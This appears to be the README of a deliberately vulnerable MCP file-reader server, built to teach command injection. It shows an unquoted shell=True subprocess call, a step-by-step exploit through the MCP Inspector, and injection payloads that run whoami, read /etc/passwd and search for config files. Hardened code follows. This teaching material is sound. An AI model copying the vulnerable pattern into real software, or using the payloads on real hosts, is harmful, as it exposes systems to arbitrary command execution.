Vulnerable File Reader Server
What is Vulnerable File Reader Server
Vulnerable-file-reader-server is a deliberately insecure MCP server designed to demonstrate command injection vulnerabilities. It showcases how improper input sanitization in file paths can lead to severe security risks, allowing attackers to execute arbitrary commands on the host system.
Use cases
Use cases include training security professionals on identifying and mitigating command injection vulnerabilities, demonstrating the importance of input sanitization, and providing a practical example for developers to learn secure coding techniques.
How to use
To use Vulnerable-file-reader-server, clone the repository, install the necessary MCP library, configure your Claude Desktop to point to the server, and then start the server in development mode. Follow the installation instructions provided in the README for detailed steps.
Key features
Key features include a demonstration of command injection vulnerabilities, educational insights into security flaws, and examples of proper security practices to mitigate such vulnerabilities.
Where to use
Vulnerable-file-reader-server is primarily used in educational environments, security training, and penetration testing scenarios to teach and understand command injection vulnerabilities and secure coding practices.
Content
Command Injection Vulnerability in MCP File Reader
This repository demonstrates a critical command injection vulnerability in a Python MCP (Model Context Protocol) server implementation. The vulnerability allows attackers to execute arbitrary shell commands on the host system by manipulating the file path parameter.
The Vulnerability
The vulnerability exists in the read_file function, which is intended to read files from a “safe” directory but contains a dangerous implementation flaw:
    import subprocess
    # VULNERABLE: file_name comes straight from the tool call and is handed to a shell
    command = f"cat {file_name}"
    result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
This code is vulnerable because:
- It uses shell=True, which invokes a shell to execute the command
- It directly interpolates user input (file_name) into the command string without proper sanitization
- It performs only superficial validation on the input path
A seemingly minor difference, whether the filename is quoted ('file_name') or inserted unquoted (file_name) into the command string, is what exposes the entire system to command execution.
Installation
Prerequisites
- Python 3.12 or higher
- MCP library version 1.6.0
Setup
- Clone this repository:
    git clone https://github.com/Eliran79/Vulnerable-file-reader-server.git
    cd Vulnerable-file-reader-server
- Install the MCP server:
    mcp install main.py
- Configure Claude Desktop to use your MCP server by editing ~/.config/claude-desktop/claude_desktop_config.json:
    {
      "mcpServers": {
        "file-reader": {
          "command": "/ABSOLUTE/PATH/TO/uv",
          "args": [
            "--directory",
            "/data/git/file_reader_server",
            "/usr/bin/uv",
            "run,--with,mcp,mcp,run,main.py"
          ]
        }
      }
    }
  Be sure to replace /ABSOLUTE/PATH/TO/uv with the actual path to your uv executable and adjust the directory path if needed.
- Start the MCP server in development mode:
    mcp dev main.py
Demonstration
- In a separate terminal, install and run the MCP inspector:
    pip install mcp-inspector
    mcp-inspector
- Connect to the server in the MCP Inspector GUI:
  - Set Transport Type to “STDIO”
  - Set Command to: run --with mcp run main.py
  - Click “Restart”
- Exploit the vulnerability:
  - Go to the “Tools” tab
  - Find the “read_file” tool
  - In the “file_name” field, enter: /tmp/safe/test.txt; whoami
  - Click “Run Tool”
- You should see the contents of test.txt followed by your username, demonstrating successful command execution.
Additional Exploitation Examples
Here are more command injection payloads to try:
    /tmp/safe/test.txt; id
    /tmp/safe/test.txt; ls -la /etc
    /tmp/safe/test.txt; cat /etc/passwd
    /tmp/safe/test.txt; echo $(hostname)
    /tmp/safe/test.txt; find / -name "*.conf" 2>/dev/null | head -5
Proper Fix
To fix this vulnerability, never use shell=True with user-provided input. Instead:
    # SECURE: Use a list of arguments instead of shell=True
    result = subprocess.check_output(['cat', file_name], shell=False)

    # OR, if shell=True is necessary, properly quote the argument:
    import shlex
    result = subprocess.check_output(f"cat {shlex.quote(file_name)}", shell=True)

    # AND perform proper path validation:
    import os
    # realpath() follows symlinks and collapses "..", which abspath() does not
    safe_dir_resolved = os.path.realpath(SAFE_DIRECTORY)
    requested_path_resolved = os.path.realpath(file_name)
    # Compare against the directory plus a separator, so that a sibling such as
    # /tmp/safe_evil does not pass a bare prefix check on /tmp/safe
    if not requested_path_resolved.startswith(safe_dir_resolved + os.sep):
        return "Error: Access denied. Path traversal attempt detected."
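The hardened read_file below is an added example, not the repository's own code. It assumes a constructed sandbox directory named safe under the system temp directory (the README uses /tmp/safe), reads the file in Python with no shell at all, and contrasts the README's startswith() prefix check with a component-wise commonpath() check.

```python
import os
import tempfile

# Constructed sandbox location for this example; the README uses /tmp/safe.
SAFE_DIRECTORY = os.path.join(tempfile.gettempdir(), "safe")


def setup_sandbox() -> str:
    """Create the safe directory with one test.txt and return that file's absolute path."""
    os.makedirs(SAFE_DIRECTORY, exist_ok=True)
    path = os.path.join(SAFE_DIRECTORY, "test.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("hello from the safe directory\n")
    return path


def naive_prefix_check(file_name: str) -> bool:
    """The startswith() check from the README, kept for comparison.
    It accepts sibling directories such as /tmp/safe_evil because they share the prefix."""
    return os.path.abspath(file_name).startswith(os.path.abspath(SAFE_DIRECTORY))


def resolve_safe_path(file_name: str) -> str:
    """Return the canonical path of file_name if it lies inside SAFE_DIRECTORY, else raise.
    realpath() follows symlinks and collapses '..', and commonpath() compares whole
    path components, so neither a sibling-prefix directory nor a symlink pointing
    out of the sandbox slips through."""
    safe_real = os.path.realpath(SAFE_DIRECTORY)
    target = os.path.realpath(os.path.join(safe_real, file_name))
    if os.path.commonpath([safe_real, target]) != safe_real:
        raise PermissionError("Access denied. Path traversal attempt detected.")
    return target


def read_file_secure(file_name: str) -> str:
    """Hardened read_file: validate the path, then read it in Python. No shell is
    involved, so characters such as ';' or '$(...)' are just part of a file name."""
    try:
        target = resolve_safe_path(file_name)
    except PermissionError as exc:
        return f"Error: {exc}"
    if not os.path.isfile(target):
        # The README payload 'test.txt; whoami' ends here: no such file, nothing executed.
        return "Error: no such file inside the safe directory"
    with open(target, encoding="utf-8") as fh:
        return fh.read()
```

Relative names are resolved against the sandbox, absolute names are accepted only if they canonicalise to a location inside it.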
Warning
⚠️ FOR EDUCATIONAL PURPOSES ONLY: This implementation contains deliberate security vulnerabilities. Never use this code in a production environment or on any system that contains sensitive information.